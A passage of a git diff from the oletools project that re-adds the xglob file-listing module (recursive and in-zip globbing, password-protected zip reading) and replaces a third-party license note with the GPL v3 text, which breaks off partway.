- #print 'Opening file', filename
- #data = open(filename, 'rb').read()
- #yield None, filename, data
-
-
-def is_glob(filespec):
- """ determine if given file specification is a single file name or a glob
-
- python's glob and fnmatch can only interpret ?, *, [list], and [ra-nge],
- (and combinations: hex_*_[A-Fabcdef0-9]).
- The special chars *?[-] can only be escaped using []
- --> file_name is not a glob
- --> file?name is a glob
- --> file* is a glob
- --> file[-._]name is a glob
- --> file[?]name is not a glob (matches literal "file?name")
- --> file[*]name is not a glob (matches literal "file*name")
- --> file[-]name is not a glob (matches literal "file-name")
- --> file-name is not a glob
-
- Also, obviously incorrect globs are treated as non-globs
- --> file[name is not a glob (matches literal "file[name")
- --> file]-[name is treated as a glob
- (it is not a valid glob but detecting errors like this requires
- sophisticated regular expression matching)
-
- Python's glob also works with globs in directory-part of path
- --> dir-part of path is analyzed just like filename-part
- --> thirdparty/*/xglob.py is a (valid) glob
-
- TODO: create a correct regexp to test for validity of ranges
- """
-
- # remove escaped special chars
- cleaned = filespec.replace('[*]', '').replace('[?]', '') \
- .replace('[[]', '').replace('[]]', '').replace('[-]', '')
-
- # check if special chars remain
- return '*' in cleaned or '?' in cleaned or \
- ('[' in cleaned and ']' in cleaned)
+#! /usr/bin/env python2
+"""
+xglob
+
+xglob is a python package to list files matching wildcards (*, ?, []),
+extending the functionality of the glob module from the standard python
+library (https://docs.python.org/2/library/glob.html).
+
+Main features:
+- recursive file listing (including subfolders)
+- file listing within Zip archives
+- helper function to open files specified as arguments, supporting files
+ within zip archives encrypted with a password
+
+Author: Philippe Lagadec - http://www.decalage.info
+License: BSD, see source code or documentation
+
+For more info and updates: http://www.decalage.info/xglob
+"""
+
+# LICENSE:
+#
+# xglob is copyright (c) 2013-2018, Philippe Lagadec (http://www.decalage.info)
+# All rights reserved.
+#
+# Redistribution and use in source and binary forms, with or without modification,
+# are permitted provided that the following conditions are met:
+#
+# * Redistributions of source code must retain the above copyright notice, this
+# list of conditions and the following disclaimer.
+# * Redistributions in binary form must reproduce the above copyright notice,
+# this list of conditions and the following disclaimer in the documentation
+# and/or other materials provided with the distribution.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
+# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+#------------------------------------------------------------------------------
+# CHANGELOG:
+# 2013-12-04 v0.01 PL: - scan several files from command line args
+# 2014-01-14 v0.02 PL: - added riglob, ziglob
+# 2014-12-26 v0.03 PL: - moved code from balbuzard into a separate package
+# 2015-01-03 v0.04 PL: - fixed issues in iter_files + yield container name
+# 2016-02-24 v0.05 PL: - do not stop on exceptions, return them as data
+# - fixed issue when using wildcards with empty path
+# 2016-04-28 v0.06 CH: - improved handling of non-existing files
+# (by Christian Herdtweck)
+# 2018-12-08 v0.07 PL: - fixed issue #373, zip password must be bytes
+
+__version__ = '0.07'
+
+
+#=== IMPORTS =================================================================
+
+import os, fnmatch, glob, zipfile
+
+#=== EXCEPTIONS ==============================================================
+
+class PathNotFoundException(Exception):
+ """ raised if given a fixed file/dir (not a glob) that does not exist """
+ def __init__(self, path):
+ super(PathNotFoundException, self).__init__(
+ 'Given path does not exist: %r' % path)
+
+
+#=== FUNCTIONS ===============================================================
+
+# recursive glob function to find files in any subfolder:
+# inspired by http://stackoverflow.com/questions/14798220/how-can-i-search-sub-folders-using-glob-glob-module-in-python
+def rglob (path, pattern='*.*'):
+ """
+ Recursive glob:
+ similar to glob.glob, but finds files recursively in all subfolders of path.
+ path: root directory where to search files
+ pattern: pattern for filenames, using wildcards, e.g. *.txt
+ """
+ #TODO: more compatible API with glob: use single param, split path from pattern
+ return [os.path.join(dirpath, f)
+ for dirpath, dirnames, files in os.walk(path)
+ for f in fnmatch.filter(files, pattern)]
+
+
+def riglob (pathname):
+ """
+ Recursive iglob:
+ similar to glob.iglob, but finds files recursively in all subfolders of path.
+ pathname: root directory where to search files followed by pattern for
+ filenames, using wildcards, e.g. *.txt
+ """
+ path, filespec = os.path.split(pathname)
+ # fix path if empty:
+ if path == '':
+ path = '.'
+ # print 'riglob: path=%r, filespec=%r' % (path, filespec)
+ for dirpath, dirnames, files in os.walk(path):
+ for f in fnmatch.filter(files, filespec):
+ yield os.path.join(dirpath, f)
+
+
+def ziglob (zipfileobj, pathname):
+ """
+ iglob in a zip:
+ similar to glob.iglob, but finds files within a zip archive.
+ - zipfileobj: zipfile.ZipFile object
+ - pathname: root directory where to search files followed by pattern for
+ filenames, using wildcards, e.g. *.txt
+ """
+ files = zipfileobj.namelist()
+ #for f in files: print f
+ for f in fnmatch.filter(files, pathname):
+ yield f
+
+
+def iter_files(files, recursive=False, zip_password=None, zip_fname='*'):
+ """
+ Open each file provided as argument:
+ - files is a list of arguments
+ - if zip_password is None, each file is listed without reading its content.
+ Wilcards are supported.
+ - if not, then each file is opened as a zip archive with the provided password
+ - then files matching zip_fname are opened from the zip archive
+
+ Iterator: yields (container, filename, data) for each file. If zip_password is None, then
+ only the filename is returned, container and data=None. Otherwise container is the
+ filename of the container (zip file), and data is the file content (or an exception).
+ If a given filename is not a glob and does not exist, the triplet
+ (None, filename, PathNotFoundException) is yielded. (Globs matching nothing
+ do not trigger exceptions)
+ """
+ #TODO: catch exceptions and yield them for the caller (no file found, file is not zip, wrong password, etc)
+ #TODO: use logging instead of printing
+ #TODO: split in two simpler functions, the caller knows if it's a zip or not
+ # print 'iter_files: files=%r, recursive=%s' % (files, recursive)
+ # choose recursive or non-recursive iglob:
+ if recursive:
+ iglob = riglob
+ else:
+ iglob = glob.iglob
+ for filespec in files:
+ if not is_glob(filespec) and not os.path.exists(filespec):
+ yield None, filespec, PathNotFoundException(filespec)
+ continue
+ for filename in iglob(filespec):
+ if zip_password is not None:
+ # Each file is expected to be a zip archive:
+ # The zip password must be bytes, not unicode/str:
+ if not isinstance(zip_password, bytes):
+ zip_password = bytes(zip_password, encoding='utf8')
+ # print('Opening zip archive %s with provided password' % filename)
+ # print('zip password: %r' % zip_password)
+ # print(type(zip_password))
+ z = zipfile.ZipFile(filename, 'r')
+ #print 'Looking for file(s) matching "%s"' % zip_fname
+ for subfilename in ziglob(z, zip_fname):
+ #print 'Opening file in zip archive:', filename
+ try:
+ data = z.read(subfilename, zip_password)
+ yield filename, subfilename, data
+ except Exception as e:
+ yield filename, subfilename, e
+ z.close()
+ else:
+ # normal file
+ # do not read the file content, just yield the filename
+ yield None, filename, None
+ #print 'Opening file', filename
+ #data = open(filename, 'rb').read()
+ #yield None, filename, data
+
+
+def is_glob(filespec):
+ """ determine if given file specification is a single file name or a glob
+
+ python's glob and fnmatch can only interpret ?, *, [list], and [ra-nge],
+ (and combinations: hex_*_[A-Fabcdef0-9]).
+ The special chars *?[-] can only be escaped using []
+ --> file_name is not a glob
+ --> file?name is a glob
+ --> file* is a glob
+ --> file[-._]name is a glob
+ --> file[?]name is not a glob (matches literal "file?name")
+ --> file[*]name is not a glob (matches literal "file*name")
+ --> file[-]name is not a glob (matches literal "file-name")
+ --> file-name is not a glob
+
+ Also, obviously incorrect globs are treated as non-globs
+ --> file[name is not a glob (matches literal "file[name")
+ --> file]-[name is treated as a glob
+ (it is not a valid glob but detecting errors like this requires
+ sophisticated regular expression matching)
+
+ Python's glob also works with globs in directory-part of path
+ --> dir-part of path is analyzed just like filename-part
+ --> thirdparty/*/xglob.py is a (valid) glob
+
+ TODO: create a correct regexp to test for validity of ranges
+ """
+
+ # remove escaped special chars
+ cleaned = filespec.replace('[*]', '').replace('[?]', '') \
+ .replace('[[]', '').replace('[]]', '').replace('[-]', '')
+
+ # check if special chars remain
+ return '*' in cleaned or '?' in cleaned or \
+ ('[' in cleaned and ']' in cleaned)
diff --git a/oletools/thirdparty/xxxswf/LICENSE.txt b/oletools/thirdparty/xxxswf/LICENSE.txt
index 9c42dabf..20d40b6b 100644
--- a/oletools/thirdparty/xxxswf/LICENSE.txt
+++ b/oletools/thirdparty/xxxswf/LICENSE.txt
@@ -1,3 +1,674 @@
-xxxswf.py is published by Alexander Hanel on
-http://hooked-on-mnemonics.blogspot.nl/2011/12/xxxswfpy.html
-without explicit license.
\ No newline at end of file
+ GNU GENERAL PUBLIC LICENSE
+ Version 3, 29 June 2007
+
+ Copyright (C) 2007 Free Software Foundation, Inc.
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+ Preamble
+
+ The GNU General Public License is a free, copyleft license for
+software and other kinds of works.
+
+ The licenses for most software and other practical works are designed
+to take away your freedom to share and change the works. By contrast,
+the GNU General Public License is intended to guarantee your freedom to
+share and change all versions of a program--to make sure it remains free
+software for all its users. We, the Free Software Foundation, use the
+GNU General Public License for most of our software; it applies also to
+any other work released this way by its authors. You can apply it to
+your programs, too.
+
+ When we speak of free software, we are referring to freedom, not
+price. Our General Public Licenses are designed to make sure that you
+have the freedom to distribute copies of free software (and charge for
+them if you wish), that you receive source code or can get it if you
+want it, that you can change the software or use pieces of it in new
+free programs, and that you know you can do these things.
+
+ To protect your rights, we need to prevent others from denying you
+these rights or asking you to surrender the rights. Therefore, you have
+certain responsibilities if you distribute copies of the software, or if
+you modify it: responsibilities to respect the freedom of others.
+
+ For example, if you distribute copies of such a program, whether
+gratis or for a fee, you must pass on to the recipients the same
+freedoms that you received. You must make sure that they, too, receive
+or can get the source code. And you must show them these terms so they
+know their rights.
+
+ Developers that use the GNU GPL protect your rights with two steps:
+(1) assert copyright on the software, and (2) offer you this License
+giving you legal permission to copy, distribute and/or modify it.
+
+ For the developers' and authors' protection, the GPL clearly explains
+that there is no warranty for this free software. For both users' and
+authors' sake, the GPL requires that modified versions be marked as
+changed, so that their problems will not be attributed erroneously to
+authors of previous versions.
+
+ Some devices are designed to deny users access to install or run
+modified versions of the software inside them, although the manufacturer
+can do so. This is fundamentally incompatible with the aim of
+protecting users' freedom to change the software. The systematic
+pattern of such abuse occurs in the area of products for individuals to
+use, which is precisely where it is most unacceptable. Therefore, we
+have designed this version of the GPL to prohibit the practice for those
+products. If such problems arise substantially in other domains, we
+stand ready to extend this provision to those domains in future versions
+of the GPL, as needed to protect the freedom of users.
+
+ Finally, every program is threatened constantly by software patents.
+States should not allow patents to restrict development and use of
+software on general-purpose computers, but in those that do, we wish to
+avoid the special danger that patents applied to a free program could
+make it effectively proprietary. To prevent this, the GPL assures that
+patents cannot be used to render the program non-free.
+
+ The precise terms and conditions for copying, distribution and
+modification follow.
+
+ TERMS AND CONDITIONS
+
+ 0. Definitions.
+
+ "This License" refers to version 3 of the GNU General Public License.
+
+ "Copyright" also means copyright-like laws that apply to other kinds of
+works, such as semiconductor masks.
+
+ "The Program" refers to any copyrightable work licensed under this
+License. Each licensee is addressed as "you". "Licensees" and
+"recipients" may be individuals or organizations.
+
+ To "modify" a work means to copy from or adapt all or part of the work
+in a fashion requiring copyright permission, other than the making of an
+exact copy. The resulting work is called a "modified version" of the
+earlier work or a work "based on" the earlier work.
+
+ A "covered work" means either the unmodified Program or a work based
+on the Program.
+
+ To "propagate" a work means to do anything with it that, without
+permission, would make you directly or secondarily liable for
+infringement under applicable copyright law, except executing it on a
+computer or modifying a private copy. Propagation includes copying,
+distribution (with or without modification), making available to the
+public, and in some countries other activities as well.
+
+ To "convey" a work means any kind of propagation that enables other
+parties to make or receive copies. Mere interaction with a user through
+a computer network, with no transfer of a copy, is not conveying.
+
+ An interactive user interface displays "Appropriate Legal Notices"
+to the extent that it includes a convenient and prominently visible
+feature that (1) displays an appropriate copyright notice, and (2)
+tells the user that there is no warranty for the work (except to the
+extent that warranties are provided), that licensees may convey the
+work under this License, and how to view a copy of this License. If
+the interface presents a list of user commands or options, such as a
+menu, a prominent item in the list meets this criterion.
+
+ 1. Source Code.
+
+ The "source code" for a work means the preferred form of the work
+for making modifications to it. "Object code" means any non-source
+form of a work.
+
+ A "Standard Interface" means an interface that either is an official
+standard defined by a recognized standards body, or, in the case of
+interfaces specified for a particular programming language, one that
+is widely used among developers working in that language.
+
+ The "System Libraries" of an executable work include anything, other
+than the work as a whole, that (a) is included in the normal form of
+packaging a Major Component, but which is not part of that Major
+Component, and (b) serves only to enable use of the work with that
+Major Component, or to implement a Standard Interface for which an
+implementation is available to the public in source code form. A
+"Major Component", in this context, means a major essential component
+(kernel, window system, and so on) of the specific operating system
+(if any) on which the executable work runs, or a compiler used to
+produce the work, or an object code interpreter used to run it.
+
+ The "Corresponding Source" for a work in object code form means all
+the source code needed to generate, install, and (for an executable
+work) run the object code and to modify the work, including scripts to
+control those activities. However, it does not include the work's
+System Libraries, or general-purpose tools or generally available free
+programs which are used unmodified in performing those activities but
+which are not part of the work. For example, Corresponding Source
+includes interface definition files associated with source files for
+the work, and the source code for shared libraries and dynamically
+linked subprograms that the work is specifically designed to require,
+such as by intimate data communication or control flow between those
+subprograms and other parts of the work.
+
+ The Corresponding Source need not include anything that users
+can regenerate automatically from other parts of the Corresponding
+Source.
+
+ The Corresponding Source for a work in source code form is that
+same work.
+
+ 2. Basic Permissions.
+
+ All rights granted under this License are granted for the term of
+copyright on the Program, and are irrevocable provided the stated
+conditions are met. This License explicitly affirms your unlimited
+permission to run the unmodified Program. The output from running a
+covered work is covered by this License only if the output, given its
+content, constitutes a covered work. This License acknowledges your
+rights of fair use or other equivalent, as provided by copyright law.
+
+ You may make, run and propagate covered works that you do not
+convey, without conditions so long as your license otherwise remains
+in force. You may convey covered works to others for the sole purpose
+of having them make modifications exclusively for you, or provide you
+with facilities for running those works, provided that you comply with
+the terms of this License in conveying all material for which you do
+not control copyright. Those thus making or running the covered works
+for you must do so exclusively on your behalf, under your direction
+and control, on terms that prohibit them from making any copies of
+your copyrighted material outside their relationship with you.
+
+ Conveying under any other circumstances is permitted solely under
+the conditions stated below. Sublicensing is not allowed; section 10
+makes it unnecessary.
+
+ 3. Protecting Users' Legal Rights From Anti-Circumvention Law.
+
+ No covered work shall be deemed part of an effective technological
+measure under any applicable law fulfilling obligations under article
+11 of the WIPO copyright treaty adopted on 20 December 1996, or
+similar laws prohibiting or restricting circumvention of such
+measures.
+
+ When you convey a covered work, you waive any legal power to forbid
+circumvention of technological measures to the extent such circumvention
+is effected by exercising rights under this License with respect to
+the covered work, and you disclaim any intention to limit operation or
+modification of the work as a means of enforcing, against the work's
+users, your or third parties' legal rights to forbid circumvention of
+technological measures.
+
+ 4. Conveying Verbatim Copies.
+
+ You may convey verbatim copies of the Program's source code as you
+receive it, in any medium, provided that you conspicuously and
+appropriately publish on each copy an appropriate copyright notice;
+keep intact all notices stating that this License and any
+non-permissive terms added in accord with section 7 apply to the code;
+keep intact all notices of the absence of any warranty; and give all
+recipients a copy of this License along with the Program.
+
+ You may charge any price or no price for each copy that you convey,
+and you may offer support or warranty protection for a fee.
+
+ 5. Conveying Modified Source Versions.
+
+ You may convey a work based on the Program, or the modifications to
+produce it from the Program, in the form of source code under the
+terms of section 4, provided that you also meet all of these conditions:
+
+ a) The work must carry prominent notices stating that you modified
+ it, and giving a relevant date.
+
+ b) The work must carry prominent notices stating that it is
+ released under this License and any conditions added under section
+ 7. This requirement modifies the requirement in section 4 to
+ "keep intact all notices".
+
+ c) You must license the entire work, as a whole, under this
+ License to anyone who comes into possession of a copy. This
+ License will therefore apply, along with any applicable section 7
+ additional terms, to the whole of the work, and all its parts,
+ regardless of how they are packaged. This License gives no
+ permission to license the work in any other way, but it does not
+ invalidate such permission if you have separately received it.
+
+ d) If the work has interactive user interfaces, each must display
+ Appropriate Legal Notices; however, if the Program has interactive
+ interfaces that do not display Appropriate Legal Notices, your
+ work need not make them do so.
+
+ A compilation of a covered work with other separate and independent
+works, which are not by their nature extensions of the covered work,
+and which are not combined with it such as to form a larger program,
+in or on a volume of a storage or distribution medium, is called an
+"aggregate" if the compilation and its resulting copyright are not
+used to limit the access or legal rights of the compilation's users
+beyond what the individual works permit. Inclusion of a covered work
+in an aggregate does not cause this License to apply to the other
+parts of the aggregate.
+
+ 6. Conveying Non-Source Forms.
+
+ You may convey a covered work in object code form under the terms
+of sections 4 and 5, provided that you also convey the
+machine-readable Corresponding Source under the terms of this License,
+in one of these ways:
+
+ a) Convey the object code in, or embodied in, a physical product
+ (including a physical distribution medium), accompanied by the
+ Corresponding Source fixed on a durable physical medium
+ customarily used for software interchange.
+
+ b) Convey the object code in, or embodied in, a physical product
+ (including a physical distribution medium), accompanied by a
+ written offer, valid for at least three years and valid for as
+ long as you offer spare parts or customer support for that product
+ model, to give anyone who possesses the object code either (1) a
+ copy of the Corresponding Source for all the software in the
+ product that is covered by this License, on a durable physical
+ medium customarily used for software interchange, for a price no
+ more than your reasonable cost of physically performing this
+ conveying of source, or (2) access to copy the
+ Corresponding Source from a network server at no charge.
+
+ c) Convey individual copies of the object code with a copy of the
+ written offer to provide the Corresponding Source. This
+ alternative is allowed only occasionally and noncommercially, and
+ only if you received the object code with such an offer, in accord
+ with subsection 6b.
+
+ d) Convey the object code by offering access from a designated
+ place (gratis or for a charge), and offer equivalent access to the
+ Corresponding Source in the same way through the same place at no
+ further charge. You need not require recipients to copy the
+ Corresponding Source along with the object code. If the place to
+ copy the object code is a network server, the Corresponding Source
+ may be on a different server (operated by you or a third party)
+ that supports equivalent copying facilities, provided you maintain
+ clear directions next to the object code saying where to find the
+ Corresponding Source. Regardless of what server hosts the
+ Corresponding Source, you remain obligated to ensure that it is
+ available for as long as needed to satisfy these requirements.
+
+ e) Convey the object code using peer-to-peer transmission, provided
+ you inform other peers where the object code and Corresponding
+ Source of the work are being offered to the general public at no
+ charge under subsection 6d.
+
+ A separable portion of the object code, whose source code is excluded
+from the Corresponding Source as a System Library, need not be
+included in conveying the object code work.
+
+ A "User Product" is either (1) a "consumer product", which means any
+tangible personal property which is normally used for personal, family,
+or household purposes, or (2) anything designed or sold for incorporation
+into a dwelling. In determining whether a product is a consumer product,
+doubtful cases shall be resolved in favor of coverage. For a particular
+product received by a particular user, "normally used" refers to a
+typical or common use of that class of product, regardless of the status
+of the particular user or of the way in which the particular user
+actually uses, or expects or is expected to use, the product. A product
+is a consumer product regardless of whether the product has substantial
+commercial, industrial or non-consumer uses, unless such uses represent
+the only significant mode of use of the product.
+
+ "Installation Information" for a User Product means any methods,
+procedures, authorization keys, or other information required to install
+and execute modified versions of a covered work in that User Product from
+a modified version of its Corresponding Source. The information must
+suffice to ensure that the continued functioning of the modified object
+code is in no case prevented or interfered with solely because
+modification has been made.
+
+ If you convey an object code work under this section in, or with, or
+specifically for use in, a User Product, and the conveying occurs as
+part of a transaction in which the right of possession and use of the
+User Product is transferred to the recipient in perpetuity or for a
+fixed term (regardless of how the transaction is characterized), the
+Corresponding Source conveyed under this section must be accompanied
+by the Installation Information. But this requirement does not apply
+if neither you nor any third party retains the ability to install
+modified object code on the User Product (for example, the work has
+been installed in ROM).
+
+ The requirement to provide Installation Information does not include a
+requirement to continue to provide support service, warranty, or updates
+for a work that has been modified or installed by the recipient, or for
+the User Product in which it has been modified or installed. Access to a
+network may be denied when the modification itself materially and
+adversely affects the operation of the network or violates the rules and
+protocols for communication across the network.
+
+ Corresponding Source conveyed, and Installation Information provided,
+in accord with this section must be in a format that is publicly
+documented (and with an implementation available to the public in
+source code form), and must require no special password or key for
+unpacking, reading or copying.
+
+ 7. Additional Terms.
+
+ "Additional permissions" are terms that supplement the terms of this
+License by making exceptions from one or more of its conditions.
+Additional permissions that are applicable to the entire Program shall
+be treated as though they were included in this License, to the extent
+that they are valid under applicable law. If additional permissions
+apply only to part of the Program, that part may be used separately
+under those permissions, but the entire Program remains governed by
+this License without regard to the additional permissions.
+
+ When you convey a copy of a covered work, you may at your option
+remove any additional permissions from that copy, or from any part of
+it. (Additional permissions may be written to require their own
+removal in certain cases when you modify the work.) You may place
+additional permissions on material, added by you to a covered work,
+for which you have or can give appropriate copyright permission.
+
+ Notwithstanding any other provision of this License, for material you
+add to a covered work, you may (if authorized by the copyright holders of
+that material) supplement the terms of this License with terms:
+
+ a) Disclaiming warranty or limiting liability differently from the
+ terms of sections 15 and 16 of this License; or
+
+ b) Requiring preservation of specified reasonable legal notices or
+ author attributions in that material or in the Appropriate Legal
+ Notices displayed by works containing it; or
+
+ c) Prohibiting misrepresentation of the origin of that material, or
+ requiring that modified versions of such material be marked in
+ reasonable ways as different from the original version; or
+
+ d) Limiting the use for publicity purposes of names of licensors or
+ authors of the material; or
+
+ e) Declining to grant rights under trademark law for use of some
+ trade names, trademarks, or service marks; or
+
+ f) Requiring indemnification of licensors and authors of that
+ material by anyone who conveys the material (or modified versions of
+ it) with contractual assumptions of liability to the recipient, for
+ any liability that these contractual assumptions directly impose on
+ those licensors and authors.
+
+ All other non-permissive additional terms are considered "further
+restrictions" within the meaning of section 10. If the Program as you
+received it, or any part of it, contains a notice stating that it is
+governed by this License along with a term that is a further
+restriction, you may remove that term. If a license document contains
+a further restriction but permits relicensing or conveying under this
+License, you may add to a covered work material governed by the terms
+of that license document, provided that the further restriction does
+not survive such relicensing or conveying.
+
+ If you add terms to a covered work in accord with this section, you
+must place, in the relevant source files, a statement of the
+additional terms that apply to those files, or a notice indicating
+where to find the applicable terms.
+
+ Additional terms, permissive or non-permissive, may be stated in the
+form of a separately written license, or stated as exceptions;
+the above requirements apply either way.
+
+ 8. Termination.
+
+ You may not propagate or modify a covered work except as expressly
+provided under this License. Any attempt otherwise to propagate or
+modify it is void, and will automatically terminate your rights under
+this License (including any patent licenses granted under the third
+paragraph of section 11).
+
+ However, if you cease all violation of this License, then your
+license from a particular copyright holder is reinstated (a)
+provisionally, unless and until the copyright holder explicitly and
+finally terminates your license, and (b) permanently, if the copyright
+holder fails to notify you of the violation by some reasonable means
+prior to 60 days after the cessation.
+
+ Moreover, your license from a particular copyright holder is
+reinstated permanently if the copyright holder notifies you of the
+violation by some reasonable means, this is the first time you have
+received notice of violation of this License (for any work) from that
+copyright holder, and you cure the violation prior to 30 days after
+your receipt of the notice.
+
+ Termination of your rights under this section does not terminate the
+licenses of parties who have received copies or rights from you under
+this License. If your rights have been terminated and not permanently
+reinstated, you do not qualify to receive new licenses for the same
+material under section 10.
+
+ 9. Acceptance Not Required for Having Copies.
+
+ You are not required to accept this License in order to receive or
+run a copy of the Program. Ancillary propagation of a covered work
+occurring solely as a consequence of using peer-to-peer transmission
+to receive a copy likewise does not require acceptance. However,
+nothing other than this License grants you permission to propagate or
+modify any covered work. These actions infringe copyright if you do
+not accept this License. Therefore, by modifying or propagating a
+covered work, you indicate your acceptance of this License to do so.
+
+ 10. Automatic Licensing of Downstream Recipients.
+
+ Each time you convey a covered work, the recipient automatically
+receives a license from the original licensors, to run, modify and
+propagate that work, subject to this License. You are not responsible
+for enforcing compliance by third parties with this License.
+
+ An "entity transaction" is a transaction transferring control of an
+organization, or substantially all assets of one, or subdividing an
+organization, or merging organizations. If propagation of a covered
+work results from an entity transaction, each party to that
+transaction who receives a copy of the work also receives whatever
+licenses to the work the party's predecessor in interest had or could
+give under the previous paragraph, plus a right to possession of the
+Corresponding Source of the work from the predecessor in interest, if
+the predecessor has it or can get it with reasonable efforts.
+
+ You may not impose any further restrictions on the exercise of the
+rights granted or affirmed under this License. For example, you may
+not impose a license fee, royalty, or other charge for exercise of
+rights granted under this License, and you may not initiate litigation
+(including a cross-claim or counterclaim in a lawsuit) alleging that
+any patent claim is infringed by making, using, selling, offering for
+sale, or importing the Program or any portion of it.
+
+ 11. Patents.
+
+ A "contributor" is a copyright holder who authorizes use under this
+License of the Program or a work on which the Program is based. The
+work thus licensed is called the contributor's "contributor version".
+
+ A contributor's "essential patent claims" are all patent claims
+owned or controlled by the contributor, whether already acquired or
+hereafter acquired, that would be infringed by some manner, permitted
+by this License, of making, using, or selling its contributor version,
+but do not include claims that would be infringed only as a
+consequence of further modification of the contributor version. For
+purposes of this definition, "control" includes the right to grant
+patent sublicenses in a manner consistent with the requirements of
+this License.
+
+ Each contributor grants you a non-exclusive, worldwide, royalty-free
+patent license under the contributor's essential patent claims, to
+make, use, sell, offer for sale, import and otherwise run, modify and
+propagate the contents of its contributor version.
+
+ In the following three paragraphs, a "patent license" is any express
+agreement or commitment, however denominated, not to enforce a patent
+(such as an express permission to practice a patent or covenant not to
+sue for patent infringement). To "grant" such a patent license to a
+party means to make such an agreement or commitment not to enforce a
+patent against the party.
+
+ If you convey a covered work, knowingly relying on a patent license,
+and the Corresponding Source of the work is not available for anyone
+to copy, free of charge and under the terms of this License, through a
+publicly available network server or other readily accessible means,
+then you must either (1) cause the Corresponding Source to be so
+available, or (2) arrange to deprive yourself of the benefit of the
+patent license for this particular work, or (3) arrange, in a manner
+consistent with the requirements of this License, to extend the patent
+license to downstream recipients. "Knowingly relying" means you have
+actual knowledge that, but for the patent license, your conveying the
+covered work in a country, or your recipient's use of the covered work
+in a country, would infringe one or more identifiable patents in that
+country that you have reason to believe are valid.
+
+ If, pursuant to or in connection with a single transaction or
+arrangement, you convey, or propagate by procuring conveyance of, a
+covered work, and grant a patent license to some of the parties
+receiving the covered work authorizing them to use, propagate, modify
+or convey a specific copy of the covered work, then the patent license
+you grant is automatically extended to all recipients of the covered
+work and works based on it.
+
+ A patent license is "discriminatory" if it does not include within
+the scope of its coverage, prohibits the exercise of, or is
+conditioned on the non-exercise of one or more of the rights that are
+specifically granted under this License. You may not convey a covered
+work if you are a party to an arrangement with a third party that is
+in the business of distributing software, under which you make payment
+to the third party based on the extent of your activity of conveying
+the work, and under which the third party grants, to any of the
+parties who would receive the covered work from you, a discriminatory
+patent license (a) in connection with copies of the covered work
+conveyed by you (or copies made from those copies), or (b) primarily
+for and in connection with specific products or compilations that
+contain the covered work, unless you entered into that arrangement,
+or that patent license was granted, prior to 28 March 2007.
+
+ Nothing in this License shall be construed as excluding or limiting
+any implied license or other defenses to infringement that may
+otherwise be available to you under applicable patent law.
+
+ 12. No Surrender of Others' Freedom.
+
+ If conditions are imposed on you (whether by court order, agreement or
+otherwise) that contradict the conditions of this License, they do not
+excuse you from the conditions of this License. If you cannot convey a
+covered work so as to satisfy simultaneously your obligations under this
+License and any other pertinent obligations, then as a consequence you may
+not convey it at all. For example, if you agree to terms that obligate you
+to collect a royalty for further conveying from those to whom you convey
+the Program, the only way you could satisfy both those terms and this
+License would be to refrain entirely from conveying the Program.
+
+ 13. Use with the GNU Affero General Public License.
+
+ Notwithstanding any other provision of this License, you have
+permission to link or combine any covered work with a work licensed
+under version 3 of the GNU Affero General Public License into a single
+combined work, and to convey the resulting work. The terms of this
+License will continue to apply to the part which is the covered work,
+but the special requirements of the GNU Affero General Public License,
+section 13, concerning interaction through a network will apply to the
+combination as such.
+
+ 14. Revised Versions of this License.
+
+ The Free Software Foundation may publish revised and/or new versions of
+the GNU General Public License from time to time. Such new versions will
+be similar in spirit to the present version, but may differ in detail to
+address new problems or concerns.
+
+ Each version is given a distinguishing version number. If the
+Program specifies that a certain numbered version of the GNU General
+Public License "or any later version" applies to it, you have the
+option of following the terms and conditions either of that numbered
+version or of any later version published by the Free Software
+Foundation. If the Program does not specify a version number of the
+GNU General Public License, you may choose any version ever published
+by the Free Software Foundation.
+
+ If the Program specifies that a proxy can decide which future
+versions of the GNU General Public License can be used, that proxy's
+public statement of acceptance of a version permanently authorizes you
+to choose that version for the Program.
+
+ Later license versions may give you additional or different
+permissions. However, no additional obligations are imposed on any
+author or copyright holder as a result of your choosing to follow a
+later version.
+
+ 15. Disclaimer of Warranty.
+
+ THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
+APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
+HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
+OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
+THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
+IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
+ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
+
+ 16. Limitation of Liability.
+
+ IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
+THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
+GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
+USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
+DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
